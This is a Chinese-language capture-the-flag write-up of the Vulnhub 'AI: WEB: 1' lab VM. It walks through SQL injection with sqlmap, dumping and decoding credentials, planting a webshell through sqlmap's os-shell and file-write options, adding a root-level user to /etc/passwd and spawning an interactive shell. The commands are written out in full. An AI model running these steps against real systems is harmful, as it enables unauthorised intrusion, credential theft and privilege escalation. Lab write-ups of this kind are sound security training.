Vulnhub - AI: WEB: 1
nmap扫描存活主机和端口,发现就开放了80端口
扫目录发现robots.txt,访问得到路径如下:
User-agent: *
Disallow:
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/但是访问这两个路径都是报403
再用nikto扫一下发现m3diNf0目录下存在info.php
不过直接访问/se3reTdir777目录能正常访问
尝试输入id为1发现返回用户admin
接着输入2、3、4……发现一共存在三个用户:admin、root、mysql
再尝试加个'发现报错,于是可以进行sql注入
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1先burp抓包将其保存到文本中
POST /se3reTdir777/ HTTP/1.1
Host: 192.168.150.148
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://192.168.150.148
Connection: close
Referer: http://192.168.150.148/se3reTdir777/
Upgrade-Insecure-Requests: 1
uid=1&Operation=Submit然后使用此请求丢到sqlmap里跑一下获取数据库
# sqlmap -r aiweb1_request.txt --dbs --batch
available databases [2]:
[*] aiweb1
[*] information_schema
再使用--dump-all参数来进一步枚举得到其用户名密码
# sqlmap -r aiweb1_request.txt -D aiweb1 --dump-all --batch
Database: aiweb1
Table: user
[3 entries]
+----+----------+-----------+
| id | lastName | firstName |
+----+----------+-----------+
| 1 | admin | admin |
| 2 | root | root |
| 3 | mysql | mysql |
+----+----------+-----------+
Database: aiweb1
Table: systemUser
[3 entries]
+----+----------------------------------------------+-----------+
| id | password | userName |
+----+----------------------------------------------+-----------+
| 1 | RmFrZVVzZXJQYXNzdzByZA== | t00r |
| 2 | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== | aiweb1pwn |
| 3 | TjB0VGhpczBuZUFsczA= | u3er |
+----+----------------------------------------------+-----------+
接着我们来看看systemUser这个表,其中密码很明显能看出是base64加密的,解一下得到账密
t00r/FakeUserPassw0rd
aiweb1pwn/MyEvilPass_f908sdaf9_sadfasf0sa
u3er/N0tThis0neAls0在前面扫的phpinfo中我们可以得知其绝对路径:/home/www/html/web1x443290o2sdf92213
于是我们就可以尝试通过sqlmap调用os-shell或者os-pwn
# sqlmap -r aiweb1_request.txt -D aiweb1 --os-shell
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
并且这里可以看到他还帮我们生成了个上传页面/se3reTdir777/uploads/tmputvpz.php
[INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' via LIMIT 'LINES TERMINATED BY' method
[INFO] the file stager has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.150.148:80/se3reTdir777/uploads/tmpuhwnb.php
[INFO] the backdoor has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.150.148:80/se3reTdir777/uploads/tmpbpmdr.php
也可以通过sqlmap写入一句话
sqlmap -r aiweb1_request.txt --file-write="hack.php" --file-dest="/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php"上传个一句话,蚁剑成功连接,但是这里还没root权限还无法获得flag
接着我们发现当前用户对 /etc/passwd有写的权限,于是我们可以添加一个具有root权限的用户,但是这里没办法直接su切换用户,还得通过msf上线啥的方法来操作😅
ls -lh /etc/passwd
perl -le 'print crypt("test","addedsalt")'
# adMpHktIn0tR2
echo "test:adMpHktIn0tR2:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
tail -l /etc/passwd
不如一开始直接上传php-reverse-shell 脚本来反弹shell
不过nc模式下的shell也不支持su交互,不过可以生成一个交互式终端,然后在root目录下得到flag:flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71}
python -c 'import pty; pty.spawn("/bin/bash")'
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-01-20,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
相关产品与服务
云数据库 MySQL
腾讯云数据库 MySQL(TencentDB for MySQL)为用户提供安全可靠,性能卓越、易于维护的企业级云数据库服务。其具备6大企业级特性,包括企业级定制内核、企业级高可用、企业级高可靠、企业级安全、企业级扩展以及企业级智能运维。通过使用腾讯云数据库 MySQL,可实现分钟级别的数据库部署、弹性扩展以及全自动化的运维管理,不仅经济实惠,而且稳定可靠,易于运维。